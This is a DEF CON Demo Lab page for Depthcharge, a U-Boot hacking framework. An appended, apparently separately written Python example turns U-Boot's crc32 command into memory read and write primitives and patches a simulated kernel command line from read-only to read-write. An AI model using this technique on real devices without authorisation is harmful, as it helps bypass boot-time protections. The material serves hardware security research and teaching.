DEF CON Forum Site Header Art

About the Demo

    Title: Depthcharge: A Framework for U-Boot Hacking

    Discord Channel: #dl-depthcharge

    Location: In-person Demolab 2

    When: Sat 10:00 – 11:50

    Presenter(s): Jon Szymaniak

    Abstract: In modern embedded systems that implement a “secure boot” flow, the boot loader plays a critical role in establishing the integrity and authenticity of software and data required to boot an operating system. Given the role and vantage point of boot loaders, they are a particularly interesting target for hardware hackers seeking to root a device and instrument it for further vulnerability hunting and reverse engineering. Although the vast majority of devices leveraging the ubiquitous and open source U-Boot boot loader leave it unprotected and trivially exploitable, more product vendors are finally implementing secure boot and (attempting to) lock down their U-Boot builds. These less common specimens offer exciting opportunities to pursue creative bypasses and explore underappreciated U-Boot functionality. The Depthcharge framework was developed to help hardware hackers methodically (ab)use some of that underappreciated U-Boot functionality in novel ways to circumvent boot-time protections, as well as expedite the identification and exploitation of “the usual suspects” within exposed U-Boot device consoles. The project includes a Python 3 library for interfacing with devices, reading and writing memory via available primitives, deploying executable payloads, and analyzing various data structures. A collection of scripts built atop the library makes this functionality readily available via the command line, and “Depthcharge Companion” firmware allows the tooling to extend its vantage point by presenting itself as a peripheral device connected to the target. This Demo Lab will introduce the basics of Depthcharge and explore how attendees can leverage and expand upon it when seeking to circumvent boot-time protections or just to further explore a system from within the U-Boot environment. For those wishing to protect their (employer’s) products from fellow DEF CON attendees, we’ll also cover the configuration checker functionality that can be used to avoid common U-Boot pitfalls.

    Audience: Hardware / Embedded Systems - Both “offense” and “defense” within this audience

    Links: GitHub: Documentation:

    Bio(s): Jon Szymaniak is Principal Security Consultant in NCC Group’s Hardware & Embedded Systems Services team and a former embedded systems engineer. His areas of interest include U-Boot, Linux, Yocto, and firmware reverse engineering. Through both his day job and hobby hacking adventures, he’s enjoyed exploring and exploiting boot ROMs, automotive ECUs, Android-based platforms, and a myriad of Internet-connected things that shouldn't be.

  • #2
    Release 0.3.0 is now available on GitHub and PyPI:

    Teaser gif below - How can we leverage U-Boot's CRC32 command as an arbitrary memory read/write primitive? Come find out how during the session!

    Afterwards, I'll plan to check in here and on Discord if folks have any devices they want to hack on, are running into any issues with Depthcharge, or just want to get started contributing to the project. (You can probably find me floating around hardware/iot/car hacking villages.)

    Oh, and obviously most importantly - I'll have free stickers.

    - Jon (jynik / @sz_jynik)

    Using U-Boot's CRC32 as an arbitrary memory read/write primitive. Locate and modify hard-coded kernel command-line arguments in a pruned-down console environment.
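The teaser above asks how U-Boot's `crc32` command becomes a read/write primitive but leaves the answer for the session. The following is an added example written for this page; it is not Depthcharge code and not the author's method. It models the U-Boot `crc32 <addr> <count> [<dest>]` command against a constructed memory image and builds both halves of the primitive on top of it: reads, because the CRC32 of exactly four bytes is a bijection and the printed checksum can be inverted; and writes, because the optional `<dest>` stores the 32-bit result, so the problem becomes finding a command whose result is the word you want. The two-command meet-in-the-middle search over a dumped, expendable window is my own construction for the simulated console. Assumptions: the stored result is big-endian (as U-Boot's hash-based `crc32` stores it; older native-endian builds would need the byte order flipped), the addresses, window, scratch cell and command line are constructed, and the filler bytes are deterministic pseudo-random data standing in for real RAM contents.

```python
"""Added example (mine, not Depthcharge's code): U-Boot's `crc32 <addr> <count> [<dest>]`
as memory primitives, against a constructed memory image.
  read : CRC32 of exactly 4 bytes is a bijection, so the printed value can be inverted.
  write: with <dest> the result is stored, so find a command whose result *is* the word.
Assumption: results are stored big-endian, as the hash-based crc32 command stores them."""
import random
import zlib

MASK = 0xFFFFFFFF
TABLE = []
for i in range(256):
    c = i
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    TABLE.append(c)
REV = {t >> 24: i for i, t in enumerate(TABLE)}   # top bytes are unique, so each step inverts

def state_after(data, start=MASK):
    """CRC register after feeding `data`, starting from register value `start`."""
    return zlib.crc32(data, start ^ MASK) ^ MASK

def state_before(data, end):
    """Run the register backwards over known bytes: the state that `data` turns into `end`."""
    s = end
    for b in reversed(data):
        i = REV[s >> 24]
        s = (((s ^ TABLE[i]) << 8) | ((i ^ b) & 0xFF)) & MASK
    return s

def forcing_bytes(start, end):
    """The unique 4 bytes that move the CRC register from `start` to `end`."""
    idx, s = [], end
    for _ in range(4):                  # backward: recover the four table indices
        i = REV[s >> 24]
        idx.append(i)
        s = ((s ^ TABLE[i]) << 8) & MASK
    out, s = bytearray(), start
    for i in reversed(idx):             # forward: the byte that selects each index
        out.append((i ^ s) & 0xFF)
        s = TABLE[i] ^ (s >> 8)
    return bytes(out)

class UBootConsole:
    """Stand-in for a pruned console that still has `crc32` but no md/mw."""
    def __init__(self, image):
        self.mem = bytearray(image)
    def crc32(self, addr, count, dest=None):
        result = zlib.crc32(self.mem[addr:addr + count])
        if dest is not None:
            self.mem[dest:dest + 4] = result.to_bytes(4, "big")   # assumed byte order
        return result

def read_word(con, addr):
    """Read primitive: invert the CRC32 of exactly the 4 bytes at `addr`."""
    return forcing_bytes(MASK, con.crc32(addr, 4) ^ MASK)

def dump(con, addr, length):
    return b"".join(read_word(con, a) for a in range(addr, addr + length, 4))

def plan_write(known, base, scratch, word):
    """Return (a1, n1), (a2, n2): `crc32 a1 n1 scratch` then `crc32 a2 n2 <dest>` stores `word`.
    `known` is a dump of [base, base + len(known)); `scratch` is an expendable cell in it."""
    n, s_off = len(known), scratch - base
    forward = {}                        # CRC of each sub-range -> packed (offset, count)
    for a in range(n):
        c = 0
        for e in range(a + 1, n + 1):
            c = zlib.crc32(known[e - 1:e], c)
            forward.setdefault(c, (a << 16) | (e - a))
    for e in range(s_off + 4, n + 1):   # step 2 ranges [a, e) that cover the scratch cell
        mid = state_before(known[s_off + 4:e], word ^ MASK)
        for a in range(s_off + 1):
            cell = int.from_bytes(forcing_bytes(state_after(known[a:s_off]), mid), "big")
            if cell in forward:         # step 1 can leave exactly those bytes in scratch
                p = forward[cell]
                return (base + (p >> 16), p & 0xFFFF), (base + a, e - a)
    raise RuntimeError("no two-command chain in this window; dump a larger one")

def write_word(con, known, base, scratch, dest, data):
    (a1, n1), (a2, n2) = plan_write(known, base, scratch, int.from_bytes(data, "big"))
    con.crc32(a1, n1, scratch)
    con.crc32(a2, n2, dest)

# Constructed target: 1 KiB of expendable RAM and a hard-coded kernel command line.
WINDOW, WINDOW_LEN, SCRATCH = 0x1000, 1024, 0x1200
BOOTARGS_ADDR, BOOTARGS = 0x2000, b"console=ttyS0,115200 root=/dev/mmcblk0p2 ro\0"

def build_target():
    img = bytearray(0x3000)
    rng = random.Random(0x4ED)          # deterministic filler standing in for real RAM
    img[WINDOW:WINDOW + WINDOW_LEN] = bytes(rng.getrandbits(8) for _ in range(WINDOW_LEN))
    img[BOOTARGS_ADDR:BOOTARGS_ADDR + len(BOOTARGS)] = BOOTARGS
    return UBootConsole(img)

def demo():
    con = build_target()
    before = dump(con, BOOTARGS_ADDR, len(BOOTARGS))    # read back the command line
    known = dump(con, WINDOW, WINDOW_LEN)                # dump the window we will search
    write_word(con, known, WINDOW, SCRATCH, BOOTARGS_ADDR + 40, b" rw\0")   # " ro\0" -> " rw\0"
    return before, bytes(con.mem[BOOTARGS_ADDR:BOOTARGS_ADDR + len(BOOTARGS)])

if __name__ == "__main__":
    before, after = demo()
    print(before, "->", after)
```

Run it directly to see the command line read back and then patched from `ro` to `rw`. On a real console every `crc32` is one serial round trip, so the costs are 256 commands to dump the 1 KiB window plus two commands per written word; the scratch cell must be somewhere the boot flow will not miss, and the window must be re-dumped if a write lands inside it. The search relies on the birthday bound: roughly N²/2 step-1 results against N²/4 step-2 requirements, so a window of a few hundred known bytes already makes a collision likely, and a 1 KiB window makes it near certain.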